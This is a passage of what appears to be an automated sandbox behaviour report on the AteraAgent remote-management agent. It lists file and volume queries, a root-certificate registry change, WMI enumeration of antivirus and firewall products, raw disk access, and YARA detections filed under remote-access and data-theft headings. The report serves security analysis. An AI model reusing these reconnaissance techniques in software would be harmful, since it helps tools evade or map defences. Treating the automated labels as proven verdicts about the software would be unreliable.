                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EBCC04 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,37_2_00007FFB02EBCC04
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EB85D4 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,_malloc_crt,_invoke_watson,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,37_2_00007FFB02EB85D4
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct

                                Stealing of Sensitive Information

                                barindex
                                Queries disk data (e.g. SMART data)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeDevice IO: \Device\Harddisk0\DR0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeDevice IO: \Device\Harddisk0\DR0

                                Remote Access Functionality

                                barindex
                                Yara detected AteraAgent
                                Source: Yara matchFile source: 22.2.AgentPackageAgentInformation.exe.26ad1de0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 55.0.AgentPackageInternalPoller.exe.1cc122b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 51.0.AgentPackageTicketing.exe.24844c30000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.1a88220e3d8.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.1fd40e70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 51.2.AgentPackageTicketing.exe.248450a0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.2.AgentPackageMonitoring.exe.22ac0860000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 58.2.AgentPackageMarketplace.exe.16597fe0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 51.2.AgentPackageTicketing.exe.24845080000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 47.0.AgentPackageUpgradeAgent.exe.10b6e4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.0.AgentPackageSTRemote.exe.27054f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 58.2.AgentPackageMarketplace.exe.165b08f0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.AteraAgent.exe.1e726670000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 53.0.AgentPackageProgramManagement.exe.2139a630000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.1a881da58e0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.0.AgentPackageMonitoring.exe.22abff10000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.1a881f474b8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12F4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12F4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A8819BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2141115637.000001A8810EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.2110035392.000001F140C40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2251027525.0000013261D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000003.1635110497.000001E04A2B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.000002340062A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2107478739.0000016597960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2079198013.000001CC124CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1871410014.00000246D408C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2561414784.0000024844E21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2249867867.0000013261C00000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.1712115953.000001E04A290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1446510712.000001E726790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.1712115953.000001E04A2B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.1850146314.00000246BAC90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.1581326542.000001FD4113C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262BDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12D3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2257779174.00000213B387D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B71F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A881E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1900882961.0000007E067C5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2152969045.000001A8822AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000037.00000002.2103371672.000001CC12F56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1903414217.0000023400341000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1449086185.000001E740B60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2141115637.000001A8810CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E728554000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262A64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2274299424.0000010B00276000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1922183275.0000023477BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1452025510.00007FFB23B20000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E7285D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2170099989.000001E43405A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000033.00000002.2571688057.00000248459CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000016.00000002.1581307208.0000026AD1C18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.0000013262782000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.2170525081.0000027055191000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1447302960.000001E7284A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003D.00000002.2271722102.00000132624F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000035.00000002.2143874595.000002139B31D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1608506296.000001A113DF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2396556042.0000010B6F640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003A.00000002.2134700713.00000165B0970000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2040710352.000002E72329F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
